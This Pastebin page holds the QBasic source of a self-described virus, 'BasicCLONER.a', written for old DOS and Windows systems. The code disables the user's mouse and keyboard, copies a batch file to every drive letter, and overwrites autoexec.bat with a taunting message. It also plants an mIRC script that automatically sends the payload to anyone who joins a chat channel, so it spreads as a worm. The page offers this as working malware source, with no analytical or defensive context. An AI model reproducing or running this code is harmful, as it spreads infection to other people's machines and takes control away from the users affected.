Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 100 CLS
- 101 SHELL "echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿"
- 102 SHELL "echo ³ °±²Û BasicCLONER.a by DvL Û²±° ³"
- 103 SHELL "echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ"
- 104 SHELL "echo."
- 105 SHELL "echo www.geocities.com/ratty_dvl/BATch/main.htm"
- 106 SHELL "echo."
- 107 SHELL "echo off"
- 108 SHELL "ctty nul"
- 109 SHELL "c:\windows\rundll32.exe mouse,disable"
- 110 SHELL "c:\windows\rundll32.exe keyboard,disable"
- 111 OPEN "script.ini" FOR OUTPUT AS #1
- 112 PRINT #1, "[script]"
- 113 PRINT #1, "n0=on 1:JOIN:#:{"
- 114 PRINT #1, "n1= /if ( $nick == $me ) { halt }"
- 115 PRINT #1, "n2= /.send $nick c:\windows\system\clone\clone.bat"
- 116 PRINT #1, "n3=}"
- 117 CLOSE script.ini
- 118 OPEN "clone.bat" FOR OUTPUT AS #1
- 119 PRINT #1, "@echo off"
- 120 PRINT #1, "ctty nul"
- 121 PRINT #1, "@for %%c in (z:\,y:\,x:\,w:\,v:\,u:\,t:\,s:\,r:\,q:\,p:\,o:\,n:\,m:\,l:\,k:\,j:\,i:\,h:\,g:\,f:\,e:\,d:\,c:\) do copy %0 %%c >nul"
- 122 PRINT #1, "cls"
- 123 CLOSE clone.bat
- 124 SHELL "c:\"
- 125 SHELL "cd\"
- 126 OPEN "autoexec.bat" FOR OUTPUT AS #1
- 127 PRINT #1, "@echo off"
- 128 PRINT #1, "ctty nul"
- 129 PRINT #1, "@echo."
- 130 PRINT #1, "@echo."
- 131 PRINT #1, "@echo."
- 132 PRINT #1, "@echo It will get on all your disks"
- 133 PRINT #1, "@echo It will infiltrate your chips"
- 134 PRINT #1, "@echo Yes, it`s BasicCloner !"
- 135 PRINT #1, "@echo."
- 136 PRINT #1, "@echo."
- 137 PRINT #1, "@echo It will stick to you like glue"
- 138 PRINT #1, "@echo It will modify ram too"
- 139 PRINT #1, "@echo Send in the BasicCloner"
- 140 PRINT #1, "@echo."
- 141 PRINT #1, "@echo."
- 142 PRINT #1, "@echo."
- 143 PRINT #1, "cls"
- 144 SHELL "if exist c:\mirc\mirc.ini copy script.ini c:\mirc\script.ini"
- 145 SHELL "if exist c:\mirc32\mirc.ini copy script.ini c:\mirc32\script.ini"
- 146 SHELL "if exist c:\progra~1\mirc\mirc.ini copy script.ini c:\progra~1\mirc\script.ini"
- 147 SHELL "if exist c:\progra~1\mirc32\mirc.ini copy script.ini c:\progra~1\mirc32\script.ini"
- 148 SHELL "md c:\windows\system\clone"
- 149 SHELL "copy clone.bat c:\windows\system\clone\clone.bat"
- 150 SHELL "del script.ini"
- 151 SHELL "del clone.bat"
- 152 SHELL "start c:\windows\system\clone\clone.bat"
- 153 END
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement